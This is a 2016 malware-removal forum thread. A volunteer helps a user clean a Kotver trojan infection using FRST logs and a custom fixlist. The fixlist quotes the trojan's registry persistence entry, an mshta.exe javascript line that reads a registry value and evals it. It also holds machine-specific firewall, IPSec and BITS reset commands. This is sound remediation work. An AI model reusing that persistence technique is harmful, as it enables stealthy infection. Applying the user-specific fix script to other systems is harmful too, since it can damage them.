My machine is infected with the trojan.kotver!gm2 virus

jayman153
New Helpee

Posts: 5

My machine is infected with the trojan.kotver!gm2 virus Nov 11, 2016 10:38:24 GMT -8

Quote

Post by jayman153 on Nov 11, 2016 10:38:24 GMT -8

FRST.txt (119.83 KB)I have the virus on one of three machines. I have been using Nortons 360, but it will not remove this one. It is causing the machine to restart several times a day. Other than that the machine seems to be running fine. I will add frst.txt as soon as I have it. Thanks

Last Edit: Nov 11, 2016 11:16:28 GMT -8 by jayman153: added frst.txt file

dbrisen
Malware Removalists

Posts: 3,688

My machine is infected with the trojan.kotver!gm2 virus Nov 11, 2016 22:19:44 GMT -8

Quote

Post by dbrisen on Nov 11, 2016 22:19:44 GMT -8

I also need the Addition.txt file that FRST made on it's first scan. See below for the details on making (if you need to) the log and using wikisend.com to upload to and attach the url link to the file.

Please follow the steps in this thread ( I think I am infected. What do I do? ).

Notice that you will need to use wikisend.com to supply me with the Addition.txt log; steps to do this are explained here .

Once you have provided the logs required, I will assist you as best we can.

Thank you.

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

jayman153 New Helpee Posts: 5	My machine is infected with the trojan.kotver!gm2 virus Nov 12, 2016 7:42:29 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by jayman153 on Nov 12, 2016 7:42:29 GMT -8 I'm sorry for the extra steps for you. I will try to do a better job at following directions. wikisend.com/download/678646/FRST.txt wikisend.com/download/212054/Addition.txt

dbrisen
Malware Removalists

Posts: 3,688

My machine is infected with the trojan.kotver!gm2 virus Nov 12, 2016 11:05:07 GMT -8

Quote

Post by dbrisen on Nov 12, 2016 11:05:07 GMT -8

FIRST >>>>

Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed):

Coupon Printer for Windows
QuickTime 7
ShopAtHome.com Helper
ShopAtHome.com Toolbar
Yahoo Search Set

To do so, left clicking on the name once and then click Uninstall/Change at the bar above the list window.

Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software.

SECOND >>>>

Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt

Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3742473775-865568857-228452302-1000\...\Run: [**hbldxvgphb<*>] => "C:\Users\Jay Edmonds\AppData\Local\43e00\b37bb.44d311" <===== ATTENTION (Value Name with invalid characters)
C:\Users\Jay Edmonds\AppData\Local\43e00
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> DefaultScope {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NSBU&chn=1000&geo=US&ver=22&locale=en_US&guid=ec72d3c0-7950-11de-99a1-0024e8200ec3&doi=2015-07-18&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=U146DF&PC=U146&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> {2ECC2220-6B53-46F5-8FD1-146A57765801} URL =
SearchScopes: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> {3205AEF9-FA45-4619-8B73-CA9A39B89CA6} URL = hxxp://isearch.shopathome.com?user_id={dac147bb-e8f9-460a-aeac-74323f9cd88e}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> {4455717E-BF2A-495F-B322-0E749094B0A1} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = hxxp://search.coupons.com/search.asp?p=df&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> {BC3A6677-658A-4848-B453-D478A95DEDA5} URL = hxxps://search.yahoo.com/search?ei=utf-8&fr=befds&p={searchTerms}&type=ieds-3.20-1510
BHO-x32: BeFrugalIEHelper -> {2335A057-CBA6-40F6-A712-C6A7C98F7813} -> No File
Toolbar: HKU\S-1-5-21-3742473775-865568857-228452302-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C}
DPF: HKLM-x32 {FC11A119-C2F7-46F4-9E32-937ABA26816E} file:///F:/CDVIEWER/CdViewer.cab
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.71\gcswf32.dll => No File
CHR Plugin: (Java Deployment Toolkit 6.0.260.3) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll => No File
CHR Plugin: (Java(TM) Platform SE 6 U26) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\4.0.60831.0\npctrl.dll => No File
CHR Plugin: (RealPlayer Version Plugin) - c:\program files (x86)\real\realplayer\Netscape6\nprpjplug.dll => No File
CHR Plugin: (Chrome NaCl) - C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.71\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.71\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.79\npGoogleUpdate3.dll => No File
CHR Plugin: (Windows Presentation Foundation) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll => No File
CHR Plugin: (RealJukebox NS Plugin) - c:\program files (x86)\real\realplayer\Netscape6\nprjplug.dll => No File
CHR Extension: (Yahoo Partner) - C:\Users\Jay Edmonds\AppData\Local\Google\Chrome\User Data\Default\Extensions\gihfmmedoddijgnhkgfgnkeohkpbipol [2016-11-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jay Edmonds\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-01]
CHR Extension: (Chrome Media Router) - C:\Users\Jay Edmonds\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-06]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [177648 2014-09-05] (Coupons.com Inc.)
C:\Program Files (x86)\Coupons
S3 SWDUMon; C:\WINDOWS\system32\DRIVERS\SWDUMon.sys [16056 2016-10-28] (SlimWare Utilities, Inc.)
U3 idsvc; no ImagePath
C:\WINDOWS\SysWOW64\000*.tmp
2016-11-04 10:10 - 2016-11-04 10:10 - 00000000 ____D C:\Users\Jay Edmonds\AppData\Local\43e00
2016-10-28 13:44 - 2015-10-30 13:12 - 00016056 _____ (SlimWare Utilities, Inc.) C:\WINDOWS\system32\Drivers\SWDUMon.sys
C:\ProgramData\SPL*.tmp
Task: {07D77CC0-6683-4C50-8C10-8438C3C5756F} - \Microsoft\Windows\Media Center\ReindexSearchRoot -> No File <==== ATTENTION
Task: {088482FA-65B8-4E17-9ABF-1DCD48E8D373} - \Microsoft\Windows\Tcpip\IpAddressConflict1 -> No File <==== ATTENTION
Task: {092E69CD-44C1-4482-A72E-1A11F16D98C8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {09F06BFE-A3C8-40E3-846A-6E6F4000C238} - \Microsoft\Windows\Tcpip\IpAddressConflict2 -> No File <==== ATTENTION
Task: {0AEAFAF6-F116-4A60-AFB4-C8B755A6E975} - \Microsoft\Windows\MobilePC\TMM -> No File <==== ATTENTION
Task: {0C8F98A0-317B-40AA-8905-72D9D6B047F2} - \{9B15DA68-46B2-4740-8F01-C07055C32FCB} -> No File <==== ATTENTION
Task: {0D288E46-C48C-4884-B873-BCDA1B2FC8F2} - \Microsoft\Windows\Media Center\ehDRMInit -> No File <==== ATTENTION
Task: {0E6C1803-1D2F-4502-ADFB-D55B84590110} - \Microsoft_MKC_Logon_Task_ipoint.exe -> No File <==== ATTENTION
Task: {102BB770-FF05-40ED-BB61-FE6F4D5A2010} - \{A056D370-F8F9-4C49-AAB9-4B8106EB07A8} -> No File <==== ATTENTION
Task: {1320E379-04E6-460B-AB6A-64C0C042051E} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {13E28EEC-566F-47D3-AF57-4FA8E2EF4DD0} - \Microsoft\Windows\SideShow\SystemDataProviders -> No File <==== ATTENTION
Task: {15622E7A-D6A1-41EE-8532-069C1CACAD41} - \Microsoft_MKC_Logon_Task_itype.exe -> No File <==== ATTENTION
Task: {195D221C-85F9-40B2-81B4-479B9AB4388E} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {215901EB-DA36-4883-A90F-396EF3AA8E3A} - \Microsoft_Hardware_Launch_ipoint_exe -> No File <==== ATTENTION
Task: {219F9B4F-72CD-49CE-8E79-A1E49DF3AF5F} - \Microsoft\Windows\Media Center\OCURDiscovery -> No File <==== ATTENTION
Task: {21ED0DF8-B69C-4766-B54B-ED170AA67C4E} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> No File <==== ATTENTION
Task: {24615EC5-A31E-47DD-BAFF-9B6AC401DE86} - \PCDoctorBackgroundMonitorTask -> No File <==== ATTENTION
Task: {2CA32995-88F0-497A-A04B-5D3145B9B4DC} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {2CFB2D13-2738-49FB-96BC-50CC840A3D23} - \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task -> No File <==== ATTENTION
Task: {30C8F0A0-B353-4D32-97EE-83365A82D2B9} - \Dell SupportAssistAgent AutoUpdate -> No File <==== ATTENTION
Task: {33787EC4-B38C-4321-A1A3-AB0F960B8F96} - \SystemToolsDailyTest -> No File <==== ATTENTION
Task: {34519DF5-B57B-4427-9BAE-78ED47873181} - \Microsoft\Windows\SideShow\SessionAgent -> No File <==== ATTENTION
Task: {38815DF8-C7BB-4C89-83CF-82493F07B90E} - \Microsoft\Windows\Media Center\PBDADiscoveryW2 -> No File <==== ATTENTION
Task: {3929AE11-3EF8-489A-A071-1815F39F8ACE} - \RealDownloaderRealUpgradeScheduledTaskS-1-5-21-3742473775-865568857-228452302-1000 -> No File <==== ATTENTION
Task: {3C39FCF0-BCBD-4278-A7E5-6C289F17941A} - \Apple\AppleSoftwareUpdate -> No File <==== ATTENTION
Task: {3F24EE2F-02CF-4FBB-A0E8-201A58593285} - \Microsoft\Windows\WindowsCalendar\Reminders - Jay Edmonds -> No File <==== ATTENTION
Task: {40DF5774-C8C3-4D4A-B4B5-C4CF3BB7FC68} - \NUAutoUpdate -> No File <==== ATTENTION
Task: {41FD1C6D-5D08-4A54-A65E-ABB7EFD44F8E} - \Microsoft\Windows\Media Center\PBDADiscovery -> No File <==== ATTENTION
Task: {43318CCD-E6BE-4002-BE1D-C0AFE68F5778} - \{74872335-F078-4053-B914-DAE154EC3EB6} -> No File <==== ATTENTION
Task: {48489594-F4E8-47EF-9ACA-6FE5F14F5657} - \NUSchedule -> No File <==== ATTENTION
Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - \Microsoft\Windows\Shell\WindowsParentalControlsMigration -> No File <==== ATTENTION
Task: {492D76C0-54AD-4819-9573-A0901D441497} - \GoogleUpdateTaskMachineUA1d0e14f78712d9 -> No File <==== ATTENTION
Task: {4978E648-9826-4DCA-B073-152620F97F1E} - \Microsoft\Windows\Media Center\MediaCenterRecoveryTask -> No File <==== ATTENTION
Task: {4CDF7942-9E47-4BB4-94AB-77545F616FD6} - \Microsoft\Windows\Tcpip\WSHReset -> No File <==== ATTENTION
Task: {4DDD20FF-DC16-432D-995D-D98A0DB5089B} - \Microsoft\Windows\Media Center\ConfigureInternetTimeService -> No File <==== ATTENTION
Task: {4F9BD2B9-E3ED-497F-99DC-DF6F232593F1} - \Microsoft_Hardware_Launch_itype_exe -> No File <==== ATTENTION
Task: {53665224-B5FD-45A2-8ABF-DEA10DA5B563} - \RealDownloaderRealUpgradeLogonTaskS-1-5-21-3742473775-865568857-228452302-1000 -> No File <==== ATTENTION
Task: {5482819A-7043-4E6F-ACBC-8D42034EFFE2} - \Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler -> No File <==== ATTENTION
Task: {590E9FBF-AEB0-4919-AC41-709ED9E01265} - \{9B04F2FB-9F4F-43C4-AF68-AB06935B9D73} -> No File <==== ATTENTION
Task: {59FC9DC4-94C2-4EF2-B578-9E1F1AA44496} - \PCDDataUploadTask -> No File <==== ATTENTION
Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - \Microsoft\Windows\Shell\WindowsParentalControls -> No File <==== ATTENTION
Task: {5CAF1C91-C127-4974-BA0C-EF8D0C2DCCDB} - \Microsoft\Windows\Media Center\mcupdate -> No File <==== ATTENTION
Task: {5D798173-98FA-46FE-A075-F9178A975A0B} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {5F9ADBE3-7035-4DEC-A2F4-004AEB5BB627} - \{BD7F3193-04E6-448C-B001-D7A12490A239} -> No File <==== ATTENTION
Task: {602D487C-832F-4857-976D-13A4630713CC} - \IHSelfDeleteTASK -> No File <==== ATTENTION
Task: {62428900-E84C-4D63-B8F3-05F4B58F71D6} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {6281E436-E50A-4C69-B7D8-74CE25DCEDD4} - \Microsoft\Windows\Media Center\InstallPlayReady -> No File <==== ATTENTION
Task: {65FFCE85-6D99-4179-8ECA-0F2D80B71A84} - \Microsoft\Windows\UpdateOrchestrator\MusUx_UpdateInterval -> No File <==== ATTENTION
Task: {6E10DB2F-1222-464E-86B9-4DB31DD35665} - \Microsoft\Windows\Media Center\PBDADiscoveryW1 -> No File <==== ATTENTION
Task: {6EAFBBCB-39EB-4575-B3F3-3F20E0887443} - \PCDEventLauncherTask -> No File <==== ATTENTION
Task: {6FBF0AB0-661D-4BF8-A37E-12E6699D3B1B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {6FEB3451-6DF1-4C05-8D9A-D8CE4F656C68} - \Microsoft\Windows\Media Center\PeriodicScanRetry -> No File <==== ATTENTION
Task: {712C6861-2B14-4E72-92BA-22B6921FE2B7} - \Microsoft\Windows\Wired\GatherWiredInfo -> No File <==== ATTENTION
Task: {725F4F47-4B7C-49ED-93E5-1160E8F87796} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {73F09F46-3AB0-4A5C-B9B2-0F0A45D199AA} - \Microsoft\Windows\Media Center\RegisterSearch -> No File <==== ATTENTION
Task: {81AD2040-9263-4965-ABA3-0EDD9B94FC8D} - \Microsoft\Windows\Media Center\ActivateWindowsSearch -> No File <==== ATTENTION
Task: {8989C405-79F8-44DB-B7A2-8C70E73C9B3A} - \Microsoft\Windows\SideShow\GadgetManager -> No File <==== ATTENTION
Task: {8DB3E06E-B403-49ED-823B-FF1862FE1440} - \Microsoft_Hardware_Launch_mousekeyboardcenter_exe -> No File <==== ATTENTION
Task: {915B2B56-558B-444E-964B-6DDE11B2265A} - \Microsoft\Windows\Media Center\UpdateRecordPath -> No File <==== ATTENTION
Task: {963A4B68-96DB-4D73-A400-182D15A4CAA3} - \Microsoft\Windows\Media Center\SqlLiteRecoveryTask -> No File <==== ATTENTION
Task: {966B7F5F-53C3-499E-A23E-752D50767998} - \Microsoft\Windows\Media Center\OCURActivate -> No File <==== ATTENTION
Task: {984EE12E-4B9D-4B1A-93B6-10D6F1E48496} - \GoogleUpdateTaskMachineCore1d0e14f6a0a719 -> No File <==== ATTENTION
Task: {9CED22B8-708B-4A52-A1AC-A1B6CDC73F57} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {A1B3E9FD-0642-4A22-8B65-B96C8B9EE1B8} - \Microsoft\Windows\Media Center\PvrScheduleTask -> No File <==== ATTENTION
Task: {A51C74E4-F6B9-48AB-BE65-4F6B40F2D06E} - \Microsoft\Windows\Media Center\mcupdate_scheduled -> No File <==== ATTENTION
Task: {A59DD391-EBBD-466F-9710-52AEAFD7AA78} - \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask -> No File <==== ATTENTION
Task: {A7DF96EA-F206-4C39-9CB3-5BC28046E0C4} - \RealUpgradeScheduledTaskS-1-5-21-3742473775-865568857-228452302-1000 -> No File <==== ATTENTION
Task: {AAB59325-92DD-499A-A086-91841D206ABF} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor -> No File <==== ATTENTION
Task: {B43C008F-FB6C-41EF-B667-2F541948857F} - \{6ED7A410-395A-4C5B-8656-FC71E45322DC} -> No File <==== ATTENTION
Task: {B4DAD3EB-3EE6-48BA-AECD-03D64D58A631} - \Microsoft\Windows\RemovalTools\MRT_HB -> No File <==== ATTENTION
Task: {B75A650C-EAA7-421B-B449-F15323994154} - \Adobe Flash Player Updater -> No File <==== ATTENTION
Task: {BD3E6F33-C1A9-488C-9117-875EB3ADA4F2} - \Microsoft\Windows\Media Center\RecordingRestart -> No File <==== ATTENTION
Task: {BF7D714A-55D7-4095-8D51-81A816517213} - \User_Feed_Synchronization-{2BA8354C-5E20-4F1F-B57D-F97EF1D4E04C} -> No File <==== ATTENTION
Task: {C0EE4FCF-5251-49B6-80ED-F0F56992D8F3} - \RealUpgradeLogonTaskS-1-5-21-3742473775-865568857-228452302-1000 -> No File <==== ATTENTION
Task: {C6E1805E-170D-4329-AEB6-CC377CB12B52} - \SpeedDiskSchedule -> No File <==== ATTENTION
Task: {C93357C1-F339-474F-B57A-645C9FDF65F3} - \Microsoft\Windows\SideShow\AutoWake -> No File <==== ATTENTION
Task: {D09D2922-C054-47B9-8ECA-8C0B948C586F} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> No File <==== ATTENTION
Task: {DB53DC3B-28BE-49F2-ACC5-1D6E52C5C4CB} - \RealDownloader Update Check -> No File <==== ATTENTION
Task: {E0844C63-9F46-41E8-9160-85912F09EC84} - \Microsoft\Windows\Media Center\DispatchRecoveryTasks -> No File <==== ATTENTION
Task: {E12E9A08-3599-4E4F-81EA-683BA38DD587} - \Microsoft\Windows\Media Center\PvrRecoveryTask -> No File <==== ATTENTION
Task: {E1C9A855-C0BD-4AEE-B186-59467E39AD37} - \IHUninstallTrackingTASK -> No File <==== ATTENTION
Task: {E8145B36-C144-4DE2-B9FF-8E8B1C493548} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {E91D6474-70CC-42BE-80FF-8BED8AF557ED} - \Microsoft\Windows\Wireless\GatherWirelessInfo -> No File <==== ATTENTION
Task: {E927876F-5C68-4412-90EE-8B4241AB4FE6} - \Microsoft\Windows\MobilePC\HotStart -> No File <==== ATTENTION
Task: {EACA24FF-236C-401D-A1E7-B3D5267B8A50} - \Microsoft\Windows\RAC\RacTask -> No File <==== ATTENTION
Task: {F8D615B2-5E9B-46F0-B8C6-CCF55821DFC0} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> No File <==== ATTENTION
Task: {FBB66A02-71A7-4267-9210-8836D9FD5ED9} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {FC4311EE-B030-49CF-B5E8-8072A38DD1C7} - \Microsoft\Windows\Media Center\StartRecording -> No File <==== ATTENTION
Task: {FD28ECEC-230A-4D8E-9292-CEC06130B0C4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:5D432CE3 [262]
AlternateDataStreams: C:\ProgramData\TEMP:792D4CF1 [169]
AlternateDataStreams: C:\ProgramData\TEMP:F5FEB7C0 [104]
HKU\S-1-5-21-3742473775-865568857-228452302-1000\Software\Classes\64ab1: "C:\WINDOWS\system32\mshta.exe" "javascript:uzGy73So="NE";l0p=new ActiveXObject("WScript.Shell");WrMR4UX1V="wA6LR7";fWgC2=l0p.RegRead("HKCU\\software\\ndtff\\wepoa");nKsTi4E="FJ6";eval(fWgC2);zG6OLiH3="RALsOSME";" <===== ATTENTION
DeleteKey: HKCU\\software\\ndtff
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Start FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

THIRD >>>>

Please download Malwarebytes Anti-Rootkit from here

Unzip the contents to a folder in a convenient location.
Open the folder where the contents were unzipped and run mbar.exe
Follow the instructions in the wizard to update and allow the program to scan your computer for threats.
Click on the Cleanup button to remove any threats and reboot if prompted to do so.
Wait while the system shuts down and the cleanup process is performed.
Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
When done, please post the two logs produced they will be in the MBAR folder... mbar-log.txt and system-log.txt .

[/ul]

LAST >>>>

INFO TO REPLY WITH:
How is your system running now?
How did the uninstall(s) go? Any problems?
The Fixlog.txt text file (you should be able to attach this file; no need for wikisend.com usually).
The logs from MBAR - mbar-log.txt and the system-log.txt files please.
Any questions?

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

jayman153
New Helpee

Posts: 5

My machine is infected with the trojan.kotver!gm2 virus Nov 12, 2016 12:27:21 GMT -8

Quote

Post by jayman153 on Nov 12, 2016 12:27:21 GMT -8

I was unable to complete the first step. I could not find reference to "ShopAtHome.com" other than an SAH install.ini, FRST & addition.txt files. Can I proceed with the steps or must I do something else? Waiting for you. Thanks, Jay

dbrisen Malware Removalists Posts: 3,688	My machine is infected with the trojan.kotver!gm2 virus Nov 12, 2016 19:01:58 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by dbrisen on Nov 12, 2016 19:01:58 GMT -8 In your Programs and Features list (in the Control Panel), what is listed in the S titles?
	I will not provide malware removal by PM; please post in your thread on the Malware Removal board. My help is always free but if you would like to help encourage me or show your thanks -----> *DONATE*

jayman153 New Helpee Posts: 5	My machine is infected with the trojan.kotver!gm2 virus Nov 12, 2016 19:11:47 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by jayman153 on Nov 12, 2016 19:11:47 GMT -8 I have Samsung USB Driver...; Smart Switch; Sound Blaster... and Symantec. I did find and delete a shortcut to ShopAtHome on my start menu.

dbrisen Malware Removalists Posts: 3,688	My machine is infected with the trojan.kotver!gm2 virus Nov 12, 2016 19:48:09 GMT -8 Quote Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by dbrisen on Nov 12, 2016 19:48:09 GMT -8 Ok; continue on with the directions and we will deal with ShopAtHome later. Thanks.
	I will not provide malware removal by PM; please post in your thread on the Malware Removal board. My help is always free but if you would like to help encourage me or show your thanks -----> *DONATE*

jayman153
New Helpee

Posts: 5

My machine is infected with the trojan.kotver!gm2 virus Nov 12, 2016 22:44:36 GMT -8

Quote

Post by jayman153 on Nov 12, 2016 22:44:36 GMT -8

the logs

wikisend.com/download/720320/Fixlog.txt

wikisend.com/download/947924/system-log.txt

mbar-log-2016-11-12 23-58-42.txt (3.53 KB)

mbar-log-2016-11-13 00-36-10.txt (2.05 KB)

It's late for an Old man like me. I will give the machine a good workout tomorrow/today. Thanks

Last Edit: Nov 12, 2016 22:46:43 GMT -8 by jayman153

dbrisen
Malware Removalists

Posts: 3,688

My machine is infected with the trojan.kotver!gm2 virus Nov 13, 2016 1:28:38 GMT -8

Quote

Post by dbrisen on Nov 13, 2016 1:28:38 GMT -8

Understood; will check with you tomorrow. For now, it looks like wikisend.com is down (I can not ping the site nor download your files) but I will check in the morning.

Thanks for the assistance on your end.

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

My machine is infected with the trojan.kotver!gm2 virus

Post by jayman153 on Nov 11, 2016 10:38:24 GMT -8

Post by dbrisen on Nov 11, 2016 22:19:44 GMT -8

Post by jayman153 on Nov 12, 2016 7:42:29 GMT -8

Post by dbrisen on Nov 12, 2016 11:05:07 GMT -8

Post by jayman153 on Nov 12, 2016 12:27:21 GMT -8

Post by dbrisen on Nov 12, 2016 19:01:58 GMT -8

Post by jayman153 on Nov 12, 2016 19:11:47 GMT -8

Post by dbrisen on Nov 12, 2016 19:48:09 GMT -8

Post by jayman153 on Nov 12, 2016 22:44:36 GMT -8

Post by dbrisen on Nov 13, 2016 1:28:38 GMT -8